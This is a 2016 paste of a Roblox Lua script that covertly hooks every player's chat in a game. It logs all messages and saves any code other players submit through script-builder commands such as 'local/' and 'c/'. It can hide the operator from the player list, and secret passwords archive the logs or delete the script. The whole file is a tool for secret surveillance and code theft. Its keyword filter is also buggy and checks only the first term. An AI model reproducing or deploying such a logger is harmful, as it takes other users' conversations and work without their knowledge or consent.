

Oct 31st, 2016
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  1. --[[ mediafire ]]--
  2. --------------------------------------------------
  3. A=Instance.new("Model",game:service'Players')
  4. A.Name="STORAGE"
  5. Garbage=Instance.new("Model",A)
  6. Garbage.Name="TRASH"
  7. Archived=Instance.new("Model",A)
  8. Archived.Name="ARCHIVED"
  9. Chatlogs=Instance.new("Model",Archived)
  10. Chatlogs.Name="CHATLOGS"
  11. --~~--
  12. if removePlayerOnExecute then
  13. if game:service'Players'[name] then
  14. game:service'Players'[name].Parent=nil
  15. end
  16. end
  17. --------------------------------------------------
  18. Terms={
  19. "game";
  20. "workspace";
  21. "Workspace";
  22. "function";
  23. "Instance.new";
  24. "Instance";
  25. [==[Instance["new"]]==];
  26. "coroutine";
  27. "IsA";
  28. "concat";
  29. "GetService";
  30. "service";
  31. ".sin";
  32. ".cos";
  33. "nil";
  34. "~=";
  35. ":Destroy()";
  36. ":Remove()";
  37. ":FindFirstChild"
  38. }
  39. --------------------------------------------------
  40. Welcome=function(player) -- sets player chatting connections up
  41. player.Chatted:connect(function(masg)
  42. Chatter(masg,player)
  43. end)
  44. end
  46. CheckTerms=function(texts)
  47. for _,text in pairs(Terms) do
  48. if string.find(texts,text) then
  49. return true;
  50. else return false;
  51. end
  52. end
  53. end
  54. --------------------------------------------------
  55. Chatter=function(msg,speaker) -- local/ c/ script/ do/
  56. if logChat==true then
  57. local newChat=Instance.new("StringValue",Chatlogs)
  58. newChat.Name=speaker.Name..": CHAT"
  59. newChat.Value=msg
  60. end
  61. if Anaminus==true then
  62. if CheckTerms(msg)==true then
  63. local nSour=Instance.new("StringValue",A)
  64. nSour.Name=speaker.Name..": SOURCE"
  65. nSour.Value=msg
  66. end
  67. end
  68. if msg=="HEUi5jA*" then
  69. print'goodbye' --[[A:Destroy()]] script:Destroy()
  70. end
  71. if msg=="9gjt4wF(kg" then
  72. for _,obj in pairs(A:GetChildren()) do
  73. if obj:IsA("StringValue") then
  74. obj.Parent=Archived
  75. print('Archived scripts in this run: '.._)
  76. end
  77. end
  78. end
  79. if msg:sub(1,6):lower()=="local/" then
  80. lsource=msg:sub(7)
  81. local newSource=Instance.new("StringValue",A)
  82. newSource.Name=speaker.Name..": LOCALSCRIPT"
  83. newSource.Value=lsource
  84. elseif msg:sub(1,2):lower()=="c/" then
  85. gsource=msg:sub(3)
  86. local newSource=Instance.new("StringValue",A)
  87. newSource.Name=speaker.Name..": NORMALSCRIPT"
  88. newSource.Value=gsource
  89. elseif msg:sub(1,3):lower()=="do/" then
  90. g2source=msg:sub(4)
  91. local newSource=Instance.new("StringValue",A)
  92. newSource.Name=speaker.Name..": NORMALSCRIPT"
  93. newSource.Value=g2source
  94. elseif msg:sub(1,7):lower()=="script/" then
  95. g3source=msg:sub(8)
  96. local newSource=Instance.new("StringValue",A)
  97. newSource.Name=speaker.Name..": NORMALSCRIPT"
  98. newSource.Value=g3source
  99. end
  100. end
  101. --~~--
  102. for i,p in pairs(game:service'Players':getPlayers()) do
  103. p.Chatted:connect(function(txt)
  104. Chatter(txt,p)
  105. end)
  106. end
  107. --~~--
  108. game:service'Players'.PlayerAdded:connect(Welcome)
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